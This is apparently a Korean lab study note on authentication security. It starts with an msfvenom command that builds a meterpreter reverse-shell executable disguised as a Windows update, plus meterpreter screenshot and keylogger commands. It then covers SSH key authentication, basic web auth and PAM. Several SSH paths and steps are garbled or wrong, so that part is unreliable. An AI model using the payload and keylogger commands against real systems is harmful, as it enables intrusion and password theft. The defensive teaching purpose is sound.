Authentication and Security

MSFVenom and MSFConsole

        msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 -b "\x00" -f exe -o /home/kali/windows_update_20250121001.exe
        msfconsole -r /home/kali/malware.rc
    

노출된 암호는 안전한가?

스크린샷 및 키로거를 통해 수집된 암호는 안전하지 않습니다.

조치 방법:

• 주기적으로 암호를 변경하십시오.
• 강력한 암호를 설정하십시오(영문 대소문자, 숫자, 특수문자 포함).
• 키 인증 방식을 사용하는 것이 더 안전합니다.

스크린샷 및 키로거 명령:

        > 화면 스크린샷: screenshot
        > 키로거 작동: keyscan_start, keyscan_dump
    

키 인증 방식 사용

키 인증 방식은 패스워드 인증 방식보다 안전합니다.

        # SSH 설정 예시
        cat /etc/ssh/sshd.conf
        PasswordAuthentication no
        KbdInteractiveAuthentication no
    

키 인증 방식 설정:

        ssh-keygen
        || ~/.ssh
        cat ~/.ssh/id_ed >> ~/.ssh/authorized_keys
    

키 복사:

        scp master@192.168.0.201:/home/master/.ssh/id_ed25519 ~/.ssh
    

SSH 접속:

        ssh master@192.168.0.201
        Enter passphrase for key '/id_ed25519': 123456
    

SSH 설정 파일 편집:

        nano /etc/ssh/sshd_config/50-cloud-init.conf
        # yes를 no로 변경 후 재시작
        systemctl restart ssh
    

웹 인증과 기타 인증 방식

웹 기본 인증:

매우 취약하며, 패킷을 잡아 인코딩 내용을 확인할 수 있습니다.

        import base64
        import json
        data = {"username": "master", "password": "123456"}
        json_data = json.dumps(data)
        encoded_json = base64.b64encode(json_data.encode('utf-8'))
        print("Encoded JSON:", encoded_json.decode('utf-8'))
    

PAM 모듈 인증:

인증을 유연하게 관리할 수 있도록 설계된 모듈화된 인증 프레임워크를 적용합니다.

기타 인증 방식:

• 패스워드 인증
• 키 인증
• 웹 기반 인증 (취약함, 옛날 공유기나 카메라에 사용)
• PAM 모듈 인증
• LDAP 인증
• 커버로스 인증 (sshd 설정 변경 가능)